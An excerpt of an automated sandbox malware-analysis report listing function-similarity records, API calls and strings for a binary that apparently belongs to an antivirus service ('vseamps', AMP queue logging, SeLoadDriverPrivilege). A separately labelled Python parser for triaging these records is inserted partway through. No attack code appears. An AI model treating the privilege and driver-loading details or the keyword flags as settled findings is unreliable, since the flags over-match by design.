                                  • API String ID: 67513587-3839141145
                                  • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                  • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                  • String ID:
                                  • API String ID: 4284112124-0
                                  • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                  • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                  • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                  • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                  • String ID: vseamps
                                  • API String ID: 3693165506-3944098904
                                  • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                  • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                  • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                  • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
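Every per-function record in this part of the report has the same shape: a "Similarity" header followed by an API ID field whose groups are separated by "$", a String ID field with the same separator (empty when the function references no strings), an API String ID and the opcode/instruction fuzzy hashes. Reading thousands of these by eye is slow, so the following Python parser, added here as an example and not part of the Joe Sandbox report or of Joe Sandbox itself, pulls those fields out of the report text and flags the functions whose API groups or strings touch privilege, service or driver handling. The sample input is three records copied from this page; the indicator keyword patterns are this example's own choice and not a classification the report defines.

```python
"""Parse the per-function 'Similarity' records of a Joe Sandbox report and
flag functions whose API groups or strings touch privilege, service or
driver handling.  Added example; not part of the report or of Joe Sandbox."""
import re
from dataclasses import dataclass

# Constructed sample: three records copied from this report (a function that
# requests SeLoadDriverPrivilege, one that creates the "vseamps" service, and a
# plain string-conversion helper that should not be flagged).
SAMPLE = """\
Similarity
• API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
• String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
• API String ID: 3408796845-4213300970
• Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
• Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
Similarity
• API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
• String ID: vseamps
• API String ID: 3693165506-3944098904
• Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
• Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
Similarity
• API ID: String$ByteCharMultiWide$AllocErrorHeapLast
• String ID:
• API String ID: 2057259594-0
• Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
• Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
"""

# Fields carried by each record; the bullet is optional so raw copy-paste works.
FIELD_RE = re.compile(
    r"^\s*[•*-]?\s*(API ID|String ID|API String ID|Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*?)\s*$"
)

# Indicator patterns are this example's own choice, not a Joe Sandbox
# classification.  API ID groups are concatenated name fragments (e.g.
# "AdjustClose...Privilege..."), so matching has to be substring-based and
# will occasionally over-match; treat hits as pivots, not verdicts.
INDICATORS = {
    "privilege": re.compile(r"Privilege|Token|Impersonate"),
    "service": re.compile(r"Service|Manager|/service|/remove"),
    "driver": re.compile(r"Driver"),
}


@dataclass
class FunctionRecord:
    api_groups: list        # "$"-separated groups of the API ID field
    strings: list           # "$"-separated entries of the String ID field
    api_string_id: str
    opcode_hash: str
    instruction_hash: str


def _split_dollar(value: str) -> list:
    """Split a '$'-separated field, dropping the empty entry an empty field yields."""
    return [part for part in value.split("$") if part]


def parse_records(text: str) -> list:
    """Return one FunctionRecord per 'Similarity' block found in text."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            if current is not None:
                blocks.append(current)
            current = {}
            continue
        match = FIELD_RE.match(line)
        if match and current is not None:
            current[match.group(1)] = match.group(2)
    if current is not None:
        blocks.append(current)
    return [
        FunctionRecord(
            api_groups=_split_dollar(b.get("API ID", "")),
            strings=_split_dollar(b.get("String ID", "")),
            api_string_id=b.get("API String ID", ""),
            opcode_hash=b.get("Opcode Fuzzy Hash", ""),
            instruction_hash=b.get("Instruction Fuzzy Hash", ""),
        )
        for b in blocks
    ]


def flag_records(records: list) -> dict:
    """Map opcode hash -> set of indicator names, for records that hit any indicator."""
    hits = {}
    for rec in records:
        haystack = rec.api_groups + rec.strings
        names = {name for name, rx in INDICATORS.items() if any(rx.search(h) for h in haystack)}
        if names:
            hits[rec.opcode_hash] = names
    return hits


if __name__ == "__main__":
    for opcode_hash, names in flag_records(parse_records(SAMPLE)).items():
        print(opcode_hash[:16], sorted(names))
```

Running it against the three sample records flags the first (privilege and driver, from the Token/Privilege API fragments and the SeLoadDriverPrivilege string) and the second (service, from the Service and Manager fragments), and leaves the string-conversion helper unflagged. Feeding the whole report text in gives the same result for every function, and the opcode and instruction fuzzy hashes carried on each record are what you would pivot on when comparing against other samples.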
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileModuleName
                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                  • API String ID: 514040917-4022980321
                                  • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                  • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                  • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                  • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 2057259594-0
                                  • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                  • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                  • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                  • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                  • Instruction ID: 3acfe1979e7d7e1f5b4555da643ce0a41fcf3091797f7ee2c0410dc528fa3366
                                  • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                  • Instruction Fuzzy Hash: 7E314DB6609F8186EB608F74E8403EE7361FB88744F44543ADA4E57B94DF38D648CB10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 1269745586-0
                                  • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                  • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                  • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                  • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                  • Instruction ID: 1f72406ae0be3f8a0d6797784de628779ca185b3c5b7caacac150e87a2f3221e
                                  • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                  • Instruction Fuzzy Hash: 86318E7AA19F8186DB60CF35E8402AE33A1FB88758F945536EA8D53B95DF3CD145CB00

                                  Control-flow Graph (rendered image not extracted; legend: Executed / Not Executed)

                                  Function at 0x1400038d0; imported API calls: SetWaitableTimer, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, SetEvent, ResetEvent, plus repeated calls to an import the graph resolves only by ordinal (#4); internal calls to 0x140001750 and 0x140002650.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                  • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                  • API String ID: 1021822269-3147033232
                                  • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                  • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                  • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                  • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                  • API String ID: 883923345-381368982
                                  • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                  • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                  • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                  • String ID:
                                  • API String ID: 1613947383-0
                                  • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                  • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                  • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                  • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                  • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                  • String ID:
                                  • API String ID: 1995290849-0
                                  • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                  • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                  • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                  • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 93015348-1041928032
                                  • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                  • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                  • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                  • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                  • GetProcAddress.KERNEL32 ref: 000000014000F117
                                    • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressProc$Load$Library
                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                  • API String ID: 3981747205-232180764
                                  • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                  • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                  • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                  • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                  • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                  • API String ID: 3682727354-300733478
                                  • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                  • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                  • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                  • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                  • API String ID: 2587151837-1427723692
                                  • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                  • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                  • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                  • String ID: SetDllDirectoryW$kernel32.dll
                                  • API String ID: 3184163350-3826188083
                                  • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                  • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
